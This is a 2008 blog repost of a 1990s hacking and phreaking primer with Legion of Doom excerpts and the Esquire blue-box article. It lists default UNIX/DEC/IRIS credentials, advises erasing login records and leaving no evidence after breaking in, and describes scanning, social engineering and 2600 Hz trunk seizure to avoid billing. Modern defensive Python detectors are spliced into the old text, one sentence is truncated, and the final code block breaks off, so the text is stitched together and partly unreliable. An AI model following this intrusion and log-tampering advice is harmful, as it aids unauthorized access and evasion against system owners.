Friday, May 16, 2008

The Newbies Handbook - How to begin in the World of Hacking

Disclaimer:-
I am not liable for any criminal or bad thing which you have done using this message and document. I am giving this here for educational purposes, and care should be taken from your side before using this document; please get written permission from the person before hacking or doing something in the network or system. This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purposes only. Always use these documents for doing good only. I don't want to promote computer crime and I'm not responsible for your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. Please read and use this for useful purposes only, to protect systems and information from bad people. Always seek written permission from the system owner or whoever is responsible for the system, and then go ahead. Give a full and honest report to the person or company about your experiments and findings from the system. Always Do Good, Think Good and Believe Good.
**************************************************************************
**************************************************************************
*********************** NEWBIES HANDBOOK ******************************
************** HOW TO BEGIN IN THE WORLD OF H/P ************************
********************** BY : Plowsk¥ Phreak ***********************************
***************************************************************************
***************************************************************************
Disclaimer-
I am not responsible for any of the information in this document, if it is
used for any other purpose than educational reading. Some of the
information on this page can be used illegally if the reader does not act
responsibly. The reader is responsible for his own actions.
You can copy anything from this file to any other file as long as you quote,
don't change it up, and give me the proper credit...like:
NEWBIES HANDBOOK
HOW TO BEGIN IN THE WORLD OF H/P
BY : Plowsk¥ Phreak
Intro:

When I got into hacking, i realized that there weren't many text philes for
newbies. so, i decided to write one. i dont really care about misspelled
werds or puncuation so, please ignore the mistakes. In this document i will
refer you to other documents a lot. (because why should i waste my time
rewriting something that has already been written?) If at any time while
reading this document you ask yourself "So...How do I hack?", then go away
now and save yourself the frustration because you'll never learn. To
hack you must understand everything about a system, and then you can get
ideas and try them out.

I tried to keep this phile as short as possible, when you read this you
should just get an idea about how to hack and why we hack. If you read this
document and the philes that i have listed, you should have a good idea
on what to do, how to do it, and why. Remember every 'project' is different.
You have to use your brain and adjust to each different one.
Tools:

There are a few things you need to have to be a hacker/phreaker.
'puter - computer (duh)
terminal software - a program like, hyper terminal or ordinary terminal
that allows you to dial out to another system.
blue box - (excerpted from 2600faq) Blue boxes use a 2600hz tone to seize
control of telephone switches that use in-band signalling. The caller may
then access special switch functions, with the usual purpose of making
free long distance phone calls, using the tones provided by the Blue Box.

scanner - a scanner is a program that dials out every number in your area
and listens for tones that are coming from other modems. (helps you locate
your local targets) a good scanner is Toneloc. Find it!
Fone (phone) line - I hope you know whut this is...
It also helps to know a computer language ex: C, C++ etc.

Info resources:
I dont know many good boards anymore because almost all of their sysops
(system operators) have been busted. But I suggest you get a server that
uses netscape and get unlimited access to the www(World wide web). And visit
these good homepages by entering their name in the webcrawler search
engine (http://webcrawler.com)

Silicon Toads Hacking Resources
Flamestrike Enterprises
The Plowsk¥ Page (mine, you can reach me from there)
Matervas Hideout
Burns Lair
Cold fire
From these pages you will find a wealth of information on h/p
(hacking/phreaking)

getting started:
the first thing you must do is get on your computer, open your terminal
software and connect to a board. (bulletin board, bbs). This is a must!
(its also a VERY basic thing). (You can usually find a bbs number on a
homepage or enter bbs in a search engine.) Now that you can do that, start
reading. Read as many text philes as possible.
Required reading:
Hackers Manifesto (at bottom)
Hackers Code of ethics
Any old issues of Phrack
any old issues of 2600
2600faq
any text documents on systems (unix, iris, dec)
DOD (department of defense) standards
Any philes on boxes (blue(one at bottom), red, beige)

For beginners, which most of you probably are, I suggest you find some of
the following systems that exist in your area and work on them first. (they
are the easiest and least risky)
This next segment is excerpted from:
A Novice's Guide to Hacking- 1989 edition
by
The Mentor
Legion of Doom/Legion of Hackers

IRIS- IRIS stands for Interactive Real Time Information System. It originally
ran on PDP-11's, but now runs on many other minis. You can
spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner,
and the ACCOUNT ID? prompt. IRIS allows unlimited tries at hacking
in, and keeps no logs of bad attempts. I don't know any default
passwords, so just try the common ones from the password database
below.
Common Accounts:
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING
DEC-10- An earlier line of DEC computer equipment, running the TOPS-10
operating system. These machines are recognized by their
'.' prompt. The DEC-10/20 series are remarkably hacker-friendly,
allowing you to enter several important commands without ever
logging into the system. Accounts are in the format [xxx,yyy] where
xxx and yyy are integers. You can get a listing of the accounts and
the process names of everyone on the system before logging in with
the command .systat (for SYstem STATus). If you see an account
that reads [234,1001] BOB JONES, it might be wise to try BOB or
JONES or both for a password on this account. To login, you type
.login xxx,yyy and then type the password when prompted for it.
The system will allow you unlimited tries at an account, and does
not keep records of bad login attempts. It will also inform you
if the UIC you're trying (UIC = User Identification Code, 1,2 for
example) is bad.
Common Accounts/Defaults:
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

UNIX- There are dozens of different machines out there that run UNIX.
While some might argue it isn't the best operating system in the
world, it is certainly the most widely used. A UNIX system will
usually have a prompt like 'login:' in lower case. UNIX also
will give you unlimited shots at logging in (in most cases), and
there is usually no log kept of bad attempts.
Common Accounts/Defaults: (note that some systems are case
sensitive, so use lower case as a general rule. Also, many times
the accounts will be unpassworded, you'll just drop right in!)
root: root
admin: admin
sysadmin: sysadmin or admin
unix: unix
uucp: uucp
rje: rje
guest: guest
demo: demo
daemon: daemon
sysbin: sysbin
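The excerpt above keeps stressing two things a defender should read the other way round: the systems allowed unlimited login tries and kept no log of bad attempts, and the accounts came with guessable default names. The modern counterpart is to log every failure and alert when one source burns through several of those default names in a short window. The following is an added example, not part of the original handbook or the Mentor's guide; the log lines are constructed in OpenSSH syslog style, the year 2008 supplied to the year-less syslog timestamps is an assumption, and the window and threshold are chosen for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Account names the excerpt above lists as common defaults. Several of these
# failing from one source in quick succession is the signature of a
# default-credential sweep rather than a user mistyping a password.
DEFAULT_ACCOUNTS = {"root", "admin", "sysadmin", "unix", "uucp", "rje",
                    "guest", "demo", "daemon", "sysbin", "manager", "operator"}

# Matches OpenSSH-style syslog lines; "invalid user" appears when the
# account does not exist on the host.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Constructed sample log (not captured from a real host).
SAMPLE_LOG = """\
May 16 01:00:01 host1 sshd[2001]: Failed password for root from 198.51.100.7 port 40001 ssh2
May 16 01:00:03 host1 sshd[2002]: Failed password for invalid user guest from 198.51.100.7 port 40002 ssh2
May 16 01:00:05 host1 sshd[2003]: Failed password for invalid user demo from 198.51.100.7 port 40003 ssh2
May 16 01:00:07 host1 sshd[2004]: Failed password for uucp from 198.51.100.7 port 40004 ssh2
May 16 01:00:09 host1 sshd[2005]: Failed password for invalid user sysadmin from 198.51.100.7 port 40005 ssh2
May 16 01:00:11 host1 sshd[2006]: Accepted password for alice from 203.0.113.9 port 50001 ssh2
May 16 01:30:00 host1 sshd[2007]: Failed password for alice from 203.0.113.9 port 50002 ssh2
"""


def parse_line(line, year=2008):
    """Return (timestamp, result, user, source) or None for non-auth lines.

    Syslog timestamps carry no year, so the caller supplies one (assumed 2008 here).
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Flag sources with >= threshold failed logins inside any sliding window."""
    failures = defaultdict(list)  # source address -> [(timestamp, user)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[1] == "Failed":
            failures[rec[3]].append((rec[0], rec[2]))

    window = timedelta(seconds=window_seconds)
    alerts = []
    for src, events in failures.items():
        events.sort()
        start, peak = 0, 0
        for end in range(len(events)):
            # Advance the window start until the span fits in window_seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            tried = sorted({user for _, user in events})
            alerts.append({
                "source": src,
                "max_failures_in_window": peak,
                "accounts_tried": tried,
                "default_accounts_hit": sorted(set(tried) & DEFAULT_ACCOUNTS),
            })
    return sorted(alerts, key=lambda a: a["source"])


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single failure from 203.0.113.9 never reaches the threshold, so a normal typo produces no alert; the five failures from 198.51.100.7 inside ten seconds do, and the alert lists which of the excerpt's default names were tried, which is the detail an analyst wants when deciding whether to lock the source out.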
Code of ethics:

Once you get in a system, do not manipulate anything but the log file
(erase the record of your bad logins) and anywhere you might have left your
handle. (name, a.k.a.) You dont want to leave your handle anywhere because
they WILL be able to track you down by your handle alone.
It's ok to be paranoid!
Dont think for one minute that you are undetectable, if you make any
mistakes, you could get caught. Here is a list of things you could do to
help yourself from getting in trouble.

* Encrypt your entire hard drive
* hide your files in a very safe spot.
* dont tell anyone that you dont know very well about your hacking. Good
hackers never reveal specific details to anyone about their current project.
They give only very vague hints of what they are doing.
* dont openly give out your real name or address
* dont join any major hacking groups, be an individual.
* Dont hack government computers, ESPECIALLY YOUR OWN GOVERNMENTS! Foreign
computers can sometimes be phun, but dont say i didnt warn you!
* Make sure that you dont leave any evidence that you have been in a system
and any evidence of who it was.
* Use your brain.
If you follow most of these guidelines, you should be safe. The last thing
you want is to end up in a one room apartment located on the third floor of
the state prison with your cellmate Bruno, the ax murderer, who's doing
life.
Getting in:
The hardest thing about hacking is getting the numbers for a system. You
can do this by using a scanning program. Then, once you connect to a system
you must first recognise what kind of system you have connected to. (by the
way, for you real brainiacs, you have to use your terminal software to call
another system.) You can usually do this by looking at the prompt you get,
if you get one. (check the Unresponsive section) Sometimes a system will
tell you as soon as you connect by saying some thing like "hello, welcome
to Anycompany using anysystem v 1.0" When you determine what system you have
connected to, this is when you start trying your logins. You can try typing
in demo as your userid and see if you can find any user names to try.
If you enter a name and you are allowed in without a password you usually,
but not always, have entered a name that you cant do a whole lot with but,
it can still be phun and you can probably find clues on how to get in on
another name.
While you're in:
There are usually many interesting files you can read in all of these
systems. You can read files about the system. You might want to try a help
command. They will usually tell you a lot. Sometimes, if you're lucky, you can
manage to download the manual of the system!
There is nothing like the thrill of your first hack, even if it wasnt a very
good one, it was probably still phun. You could read every text phile in the
world and you still probably wouldnt learn as much as you do during your
first hack. Have Phun!
This next segment is also excerpted from:
A Novice's Guide to Hacking- 1989 edition
by
The Mentor
Legion of Doom/Legion of Hackers

Unresponsive Systems
~~~~~~~~~~~~~~~~~~~~
Occasionally you will connect to a system that will do nothing but sit
there. This is a frustrating feeling, but a methodical approach to the system
will yield a response if you take your time. The following list will usually
make *something* happen.
1) Change your parity, data length, and stop bits. A system that won't re-
spond at 8N1 may react at 7E1 or 8E2 or 7S2. If you don't have a term
program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.
While having a good term program isn't absolutely necessary, it sure is
helpful.
2) Change baud rates. Again, if your term program will let you choose odd
baud rates such as 600 or 1100, you will occasionally be able to penetrate
some very interesting systems, as most systems that depend on a strange
baud rate seem to think that this is all the security they need...
3) Send a series of 's.
4) Send a hard break followed by a .
5) Type a series of .'s (periods). The Canadian network Datapac responds
to this.
6) If you're getting garbage, hit an 'i'. Tymnet responds to this, as does
a MultiLink II.
7) Begin sending control characters, starting with ^A --> ^Z.
8) Change terminal emulations. What your vt100 emulation thinks is garbage
may all of a sudden become crystal clear using ADM-5 emulation. This also
relates to how good your term program is.
9) Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
JOIN, HELP, and anything else you can think of.
10) If it's a dialin, call the numbers around it and see if a company
answers. If they do, try some social engineering.
I tried to keep this phile as short as possible to save downloading time and just telling you the very basics like what you need to do and what you need to read. I hope this was helpful.

Plowsk¥ Phreak
Here are two philes i copied for your reading pleasure:
bluebox.txt
and
The Hackers Manifesto
bluebox.txt -
The Secrets of the Little Blue Box Originally found in Esquire Magazine
THE BLUE BOX IS INTRODUCED: IT'S QUALITIES ARE REMARKED
I am in the expensively furnished living room of Al Gilbertson, the creator
of the blue box. Gilbertson is holding one of his shiny black-and-silver
blue boxes comfortably in the palm of his hand, pointing out the thirteen
little red push buttons sticking up from the console. He is dancing his
fingers over the buttons, tapping out discordant beeping electronic jingles.
He is trying to explain to me how his little blue box does nothing less than
place the entire telephone system of the world, satellites, cables and all,
at the service of the blue-box operator, free of charge.
"That's what it does. Essentially it gives you the power of a super
operator. You seize a tandem with this top button," he presses the top
button with his index finger and the blue box emits a high-pitched cheep,
"and like that," the box cheeps again "you control the phone company's long
distance switching systems from your cute little Princess phone or any old
pay phone. And you've got anonymity. An operator has to operate from a
definite location. The phone company knows where she is and what she's
doing. But with your blue box, once you hop onto a trunk, say from a Holiday
Inn 800 number, they don't know where you are, or where you're coming from,
they don't know how you slipped into their lines and popped up in that 800
number. They don't even know anything illegal is going on. And you can
obscure your origins through as many levels as you like. You can call next
door by way of White Plains, then over to Liverpool by cable and then back
here by satellite. You can call yourself from one pay phone all the way
around the world to a pay phone next to you. And you get your dime back too.
"And they can't trace the calls? They can't charge you?"
"Not if you do it the right way. But you'll find that the free-call thing
isn't really as exciting at first as the feeling of power you get from
having one of these babies in your hand. I've watched people when they first
get hold of one of these things and start using it, and discover they can
make connections, set up crisscross and zigzag switching patterns back and
forth across the world. They hardly talk to the people they finally reach.
They say hello and start thinking of what kind of call to make next. They go
a little crazy." He looks down at the neat little package in his palm. His
fingers are still dancing, tapping out beeper patterns.
"I think it's something to do with how small my models are. There are lots
of blue boxes around, but mine are the smallest and most sophisticated
electronically. I wish I could show you the prototype we made for our big
syndicate order."
He sighs. "We had this order for a thousand blue boxes from a syndicate
front man in Las Vegas. They use them to place bets coast to coast, keep
lines open for hours, all of which can get expensive if you have to pay. The
deal was a thousand blue boxes for $300 apiece. Before then we retailed them
for $1500 apiece, but $300,000 in one lump was hard to turn down. We had a
manufacturing deal worked out in the Philippines. Everything was ready to
go. Anyway, the model I had ready for limited mass production was small
enough to fit inside a flip-top Marlboro box. It had flush-touch panels for
a keyboard, rather than these unsightly buttons sticking out. Looked just
like a tiny portable radio. In fact I had designed it with a tiny transistor
receiver to get one AM channel, so in case the law became suspicious the
owner could switch on the radio part, start snapping his fingers and no one
could tell anything illegal was going on. I thought of everything for this
model--I had it lined with a band of thermite which could be ignited by
radio signal from a tiny button transmitter on your belt, so it could be
burned to ashes instantly in case of a bust. It was beautiful. A beautiful
little machine. You should have seen the face on these syndicate guys when
they came back after trying it out. They'd hold it in their palm like they
never wanted to let it go, and they'd say, 'I can't believe it.' You
probably won't believe it until you try it."
THE BLUE BOX IS TESTED: CERTAIN CONNECTIONS ARE MADE
About eleven o'clock two nights later Fraser Lucey has a blue box in the
palm of his left hand and a phone in the palm of his right. He is standing
inside a phone booth next to an isolated shut-down motel. I am standing
outside the phone booth.
Fraser likes to show off his blue box for people. Until a few weeks ago when
Pacific Telephone made a few arrests in his city, Fraser Lucey liked to
bring his blue box to parties. It never failed: a few cheeps from his device
and Fraser became the center of attention at the very hippest of gatherings,
playing phone tricks and doing request numbers for hours. He began to take
orders for his manufacturer in Mexico. He became a dealer.
Fraser is cautious now about where he shows off his blue box. But he never
gets tired of playing with it. "It's like the first time every time," he
tells me.
Fraser puts a dime in the slot. He listens for a tone and holds the receiver
up to my ear. I hear the tone.
Fraser begins describing, with a certain practiced air, what he does while
he does it.
"I'm dialing an 800 number now. Any 800 number will do. It's toll free.
Tonight I think I'll use the Ryder Rent A Van number. Listen it's ringing.
Here, you hear it? Now watch."
He places the blue box over the mouthpiece of the phone so that the one
silver and twelve black push buttons are facing up toward me. He presses the
silver button - the one at the top - and I hear that high-pitched beep.
"That's 2600 cycles per second to be exact," says Lucey. "Now, quick,
listen."
He shoves the ear piece at me. The ringing has vanished. The line gives a
slight hiccough, there is a sharp buzz, and then nothing but soft white
noise.
"We're home free now," Lucey tells me, taking back the phone and applying
the blue box to its mouthpiece once again. "We're up on a tandem, into a
long-lines trunk. Once you're up on a tandem, you can send yourself anywhere
you want to go." He decides to check out London first. He chooses a certain
pay phone located in Waterloo station. This particular pay phone is popular
with the phone-phreaks because there are usually people walking by at all
hours who will pick it up and talk for a while.
He presses the lower left-hand corner button which is marked "KP" on the
face of the box.
"That's Key Pulse. It tells the tandem we're ready to give it instructions.
First I'll punch out KP 182 START, which will slide us into the overseas
sender in White Plains." I hear neat clunk-cheep. "I think we'll head over
to England by satellite. Cable is actually faster and the connection is
somewhat better, but I like going by satellite. So I just punch out KP Zero
44. The Zero is supposed to guarantee a satellite connection and 44 is the
country code for England. Okay...we're there. In Liverpool actually. Now all
I have to do is punch out the London area code which is 1, and dial up the
pay phone. Here, listen, I've got a ring now."
I hear the soft quick purr-purr of a London ring. Then someone picks up the
phone. "Hello," says the London voice.
"Hello, Who's this?" Fraser asks.
"Hello. There's actually nobody here. I just picked this up while I was
passing by. This is a public phone. There's no one here to answer actually."
"Hello. Don't hang up. I'm calling from the United States."
"Oh. What is the purpose of the call? This is a public phone you know."
"Oh. You know. To check out, uh, to find out what's going on in London. How
is it there?"
"It's five o'clock in the morning. It's raining now."
"Oh. Who are you?"
The London passerby turns out to be an R.A.F. enlistee on his way back to
the base in Lincolnshire, with a terrible hangover after a thirty-six hour
pass.
He and Fraser talk about the rain. They agree that it's nicer when it's not
raining. They say good-bye and Fraser hangs up. His dime returns with a nice
clink.
"Isn't that far out," he says grinning at me. "London. Like that."
Fraser squeezes the little blue box affectionately in his palm. "I told ya
this thing is for real. Listen, if you don't mind I'm gonna try this girl I
know in Paris. I usually give her a call around this time. It freaks her
out. This time I'll use the Penske 800 number and we'll go by overseas cable
133; 33 is the country code for France, the 1 sends you by cable. Okay, here
we go. Oh damn. Busy. Who could she be talking to at this time?"
A state police car cruises slowly by the motel. The car does not stop, but
Fraser gets nervous. We hop back into his car and drive ten miles in the
opposite direction until we reach a Texaco station locked up for the night.
We pull up to a phone booth by the tire pump. Fraser dashes inside and tries
the Paris number. It is busy again.
"I don't understand who she could be talking to. The circuits may be busy.
It's too bad I haven't learned how to tap into lines overseas with this
thing yet."
Fraser begins to phreak around, as the phone phreaks say. He dials a leading
nationwide charge card's 800 number and punches out the tones that bring him
the Time recording in Sydney, Australia. He beeps up the Weather recording
in Rome, in Italian of course. He calls a friend in Chicago and talks about
a certain over the counter stock they are into heavily. He finds the Paris
number busy again. He calls up a dealer of another sort and talks in code.
He calls up Joe Engressia, the original blind phone phreak genius, and pays
his respects. There are other calls. Finally Fraser gets through to his
young lady in Paris. They both agree the circuits must have been busy, and
criticize the Paris telephone system. At two-thirty in the morning Fraser
hangs up, pockets his dime, and drives off, steering with one hand, holding
what he calls his "lovely little blue box" in the other.
YOU CAN CALL LONG DISTANCE FOR LESS THAN YOU THINK
"You see, a few years ago the phone company made one big mistake,"
Gilbertson explains two days later in his apartment. "They were careless
enough to let some technical journal publish the actual frequencies used to
create all their multi-frequency tones. Just a theoretical article some Bell
Telephone Laboratories engineer was doing about switching theory, and he
listed the tones in passing. At MIT I had been fooling around with phones
for several years before I came across a copy of the journal in the
engineering library. I ran back to the lab and it took maybe twelve hours
from the time I saw that article to put together the first working blue box.
It was bigger and clumsier than this little baby, but it worked."
It's all there on public record in that technical journal written mainly by
Bell Lab people for other telephone engineers. Or at least it was public.
"Just try and get a copy of that issue at some engineering school library
now. Bell has had them all red-tagged and withdrawn from circulation,"
Gilbertson tells me.
"But it's too late now. It's all public now. And once they became public the
technology needed to create your own beeper device is within the range of
any twelve-year-old kid, any twelve-year-old blind kid as a matter of fact.
And he can do it in less than the twelve hours it took us. Blind kids do it
all the time. They can't build anything as precise and compact as my beeper
box, but theirs can do anything mine can do."
"How?"
"Okay. About twenty years ago AT&T made a multi-million dollar decision to
operate its entire long-distance switching system on twelve electronically
generated combinations of six master tones. Those are the tones you
sometimes hear in the background after you've dialed a long distance number.
They decided to use some very simple tones. The tone for each number is just
two fixed single-frequency tones played simultaneously to create a certain
beat frequency. Like 1300 cycles per second and 900 cycles per second played
together give you the tone for digit 5. Now, what some of these phone
phreaks have done is get themselves access to an electric organ. Any cheap
family home entertainment organ. Since the frequencies are public knowledge
now, one blind phone phreak has even had them recorded in one of those
talking books for the blind, they just have to find the musical notes on the
organ which correspond to the phone tones. Then they tape them. For
instance, to get Ma Bell's tone for the number, you press down organ keys F3
and A3 (900 and 700 cycles per second) at the same time. To produce the tone
for 2 it's F3 and C6 (1100 and 700 c.p.s). The phone phreaks circulate the
whole list of notes so there's no trial and error anymore."
He shows me a list of the rest of the phone numbers and the two electric
organ keys that produce them.
"Actually, you have to record these notes at 3 3/4 inches per second tape
speed and double it to 7 1/2 inches per second when you play them back, to
get the proper tones," he adds.
"So once you have all the tones recorded, how do you plug them into the
phone system?"
"Well, they take their organ and their cassette recorder, and start banging
out entire phone numbers in tones on the organ, including country codes,
routing instructions, 'KP' and 'Start' tones. Or, if they don't have an
organ, someone in the phone-phreak network sends them a cassette with all
the tones recorded with a voice saying 'Number one,' then you have the tone,
'Number two,' then the tone and so on. So with two cassette recorders they
can put together a series of phone numbers by switching back and forth from
number to number. Any idiot in the country with a cheap cassette recorder
can make all the free calls he wants."
"You mean you just hold the cassette recorder up to the mouthpiece and
switch in a series of beeps you've recorded? The phone thinks that anything
that makes these tones must be its own equipment?"
"Right. As long as you get the frequency within thirty cycles per second of
the phone company's tones, the phone equipment thinks it hears its own voice
talking to it. The original grandaddy phone phreak was this blind kid with
perfect pitch, Joe Engressia, who used to whistle into the phone. An
operator could tell the difference between his whistle and the phone
company's electronic tone generator, but the phone company's switching
circuit can't tell them apart.
The bigger the phone company gets and the further away from human operators
it gets, the more vulnerable it becomes to all sorts of phone Phreaking."
A GUIDE FOR THE PERPLEXED
"But wait a minute," I stop Gilbertson. "If everything you do sounds like
phone-company equipment, why doesn't the phone company charge you for the
call the way it charges its own equipment?"
"Okay. That's where the 2600-cycle tone comes in. I better start from the
beginning."
The beginning he describes for me is a vision of the phone system of the
continent as thousands of webs, of long-line trunks radiating from each of
the hundreds of toll switching offices to the other toll switching offices.
Each toll switching office is a hive compacted of thousands of long-distance
tandems constantly whistling and beeping to tandems in far-off toll
switching offices.
The tandem is the key to the whole system. Each tandem is a line with some
relays with the capability of signaling any other tandem in any other toll
switching office on the continent, either directly one-to-one or by
programming a roundabout route several other tandems if all the direct
routes are busy. For instance, if you want to call from New York to Los
Angeles and traffic is heavy on all direct trunks between the two cities,
your tandem in New York is programmed to try the next best route, which may
send you down to a tandem in New Orleans, then up to San Francisco, or down
to a New Orleans tandem, back to an Atlanta tandem, over to an Albuquerque
tandem and finally up to Los Angeles.
When a tandem is not being used, when it's sitting there waiting for someone
to make a long-distance call, it whistles. One side of the tandem, the side
"facing" our home phone, whistles at 2600 cycles per second toward all the
home phones serviced by the exchange, telling them it is at their service,
should they be interested in making a long-distance call. The other side of
the tandem is whistling 2600 c.p.s. into one or more long distance trunk
lines, telling the rest of the phone system that it is neither sending nor
receiving a call through the trunk at the moment, that it has no use for
that trunk at the moment.
When you dial a long-distance number the first thing that happens is that
you are hooked into a tandem. A register comes up to the side of the tandem
facing away from you and presents that side with the number you dialed. This
sending side of the tandem stops whistling 2600 into its trunk line. When a
tandem stops the 2600 tone it has been sending through a trunk, the trunk is
said to be "seized," and is now ready to carry the number you have dialed,
converted into multi-frequency beep tones, to a tandem in the area code and
central office you want.
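The weakness the article is circling is that supervision and dialing ride in the same audio band as the caller's voice, so a switch cannot tell its own 2600 cycle tone from one played into a mouthpiece. The same property is what the phone company's "blue-box hunting program" mentioned later could exploit in the other direction: on a line that is supposed to be carrying a conversation, a sustained 2600 Hz tone has no innocent explanation. The following added example (not from the article, and not any carrier's actual detector) scans an audio stream in short blocks and reports which blocks are dominated by 2600 Hz, using the Goertzel algorithm for a single DFT bin. The signals are synthesized here; the 8000 Hz sampling rate, the 50 ms block and the 0.15 energy-fraction threshold are assumptions chosen for illustration.

```python
import math
import random

SAMPLE_RATE = 8000      # telephone-band sampling rate, Hz (assumed)
SUPERVISION_HZ = 2600   # idle-trunk supervision tone described above
BLOCK = 400             # 50 ms blocks: 2600 Hz falls exactly on DFT bin 130


def goertzel_power(samples, target_hz, sample_rate=SAMPLE_RATE):
    """|X[k]|^2 at the DFT bin nearest target_hz, via the Goertzel recurrence."""
    n = len(samples)
    k = round(n * target_hz / sample_rate)
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev * s_prev + s_prev2 * s_prev2 - coeff * s_prev * s_prev2


def tone_fraction(samples, target_hz, sample_rate=SAMPLE_RATE):
    """Share of the block's energy at target_hz (0 to 0.5 for a real signal).

    By Parseval, sum(x^2) == sum(|X[k]|^2) / N, and a real sine splits its
    energy between bins k and N-k, so a pure on-bin tone scores exactly 0.5.
    """
    n = len(samples)
    total = sum(x * x for x in samples)
    if total == 0.0:
        return 0.0
    return goertzel_power(samples, target_hz, sample_rate) / (n * total)


def scan_line(samples, threshold=0.15, block=BLOCK):
    """Per-block verdicts: True where 2600 Hz dominates the block."""
    verdicts = []
    for start in range(0, len(samples) - block + 1, block):
        chunk = samples[start:start + block]
        verdicts.append(tone_fraction(chunk, SUPERVISION_HZ) >= threshold)
    return verdicts


# --- constructed test signals (synthetic, not a recorded line) ---
def make_tone(freq_hz, seconds, amplitude=0.3, sample_rate=SAMPLE_RATE):
    n = int(seconds * sample_rate)
    return [amplitude * math.sin(2 * math.pi * freq_hz * i / sample_rate)
            for i in range(n)]


def make_noise(seconds, amplitude=0.3, seed=1, sample_rate=SAMPLE_RATE):
    """Broadband noise standing in for speech on the line."""
    rng = random.Random(seed)
    return [rng.uniform(-amplitude, amplitude)
            for _ in range(int(seconds * sample_rate))]


def demo_call():
    """0.1 s of talk, 0.1 s with 2600 Hz injected over the talk, 0.1 s of talk."""
    injected = [a + b for a, b in zip(make_noise(0.1, seed=2),
                                      make_tone(SUPERVISION_HZ, 0.1))]
    return make_noise(0.1, seed=1) + injected + make_noise(0.1, seed=3)


if __name__ == "__main__":
    print(scan_line(demo_call()))  # 2600 Hz shows up only in the middle two blocks
```

Because the detector only measures energy at one frequency, it shares the switch's blindness: it cannot say who produced the tone, only that it is there. That is exactly why the article's engineers could build a hunting program from it, and why the real fix was to move signalling out of the voice band altogether.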
Now when a blue-box operator wants to make a call from New Orleans to New
York he starts by dialing the 800 number of a company which might happen to
have its headquarters in Los Angeles. The sending side of this New Orleans
tandem stops sending 2600 out over the trunk to the central office in Los
Angeles, thereby seizing the trunk. Your New Orleans tandem begins sending
beep tones to a tandem it has discovered idly whistling 2600 cycles in Los
Angeles. The receiving end of that L.A. tandem is seized, stops whistling
2600, listens to the beep tones which tell it which L.A. phone to ring, and
starts ringing the 800 number. Meanwhile, a mark made in the New Orleans
office accounting tape indicates that a call from your New Orleans phone to
the 800 number in L.A. has been initiated and gives the call a code number.
Everything is routine so far.
But then the phone phreak presses his blue box to the mouthpiece and pushes
the 2600-cycle button, sending 2600 out from the New Orleans tandem over the
trunk. The L.A. tandem notices the 2600 cycles are coming over the line again
and assumes that New Orleans has hung up because the trunk is whistling as if
idle. But,
Thus the blue-box operator in New Orleans now is in touch with a tandem in
L.A. which is waiting like an obedient genie to be told what to do next.
The blue-box owner then beeps out the ten digits of the New York number
which tells the L.A. tandem to relay a call to New York City. Which it
promptly does. As soon as your party picks up the phone in New York, the
side of the New Orleans tandem facing you stops sending 2600 to you and
starts carrying his voice to you by way of the L.A. tandem. A notation is
made on the accounting tape that the connection has been made on the 800
call which had been initiated and noted earlier. When you stop talking to
New York a notation is made that the 800 call has ended.
At three the next morning, when the phone company's accounting computer starts
reading back over the master accounting tape for the past day, it records
that a call of a certain length of time was made from your New Orleans home
to an L.A. 800 number and, of course the accounting computer has been
trained to ignore these toll free 800 calls when compiling your monthly
bill.
"All they can prove is that you made an 800 call," Gilbertson the inventor
concludes. "Of course, if you're foolish enough to talk for two hours on an
800 call, and they've installed one of their special anti-fraud computer
programs to watch out for such things, they may spot you and ask you why you
took two hours talking to Army Recruiting's 800 number when you're 4-F. But
if you do it from a pay phone, they may discover something peculiar the next
day, if they've got a blue-box hunting program in their computer, but you'll
be a long time gone from the pay phone by then. Using a pay phone is almost
guaranteed safe."
"What about the recent series of blue-box arrests all across the country,
New York, Cleveland, and so on?" I asked. "How were they caught so easily?"
"From what I can tell, they made one big mistake. They were seizing trunks
using an area code plus 555-1212 instead of an 800 number. When you send
multi-frequency beep tones off 555 you get a charge for it on your tape and
the accounting computer knows there's something wrong when it tries to bill
you for a two-hour call to Akron, Ohio, information, and it drops a trouble
card which goes right into the hands of the security agent if they're
looking for blue-box users.
"Whoever sold those guys their blue boxes didn't tell them how to use them
properly, which is fairly irresponsible. And they were fairly stupid to use
them at home all the time. But what those arrests really mean is that an
awful lot of blue boxes are flooding into the country and that people are
finding them so easy to make that they know how to make them before they
know how to use them. Ma Bell is in trouble."
"And if a blue-box operator or a cassette-recorder phone phreak sticks to
pay phones and 800 numbers, the phone company can't stop them?"
"Not unless they change their entire nationwide long-lines technology, which
will take them a few billion dollars and twenty years. Right now they can't
do a thing. They're screwed."
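Gilbertson's two remarks above, that an anti-fraud program can be set to watch for implausibly long 800 calls and that a two-hour billed call to directory assistance drops a trouble card, describe billing-side anomaly checks. The following is an added example, not part of the article, that models both checks over constructed call-detail records; the record format, the numbers and the thresholds are invented for illustration.

```python
"""Billing-side checks of the kind described above: added example, not from
the article. Call records and thresholds are constructed for illustration."""
from collections import Counter
from dataclasses import dataclass

# Constructed call-detail records: (billed line, dialed number, duration in seconds).
SAMPLE_CDRS = [
    ("504-555-0101", "800-555-0199", 95),     # short toll-free call: ordinary
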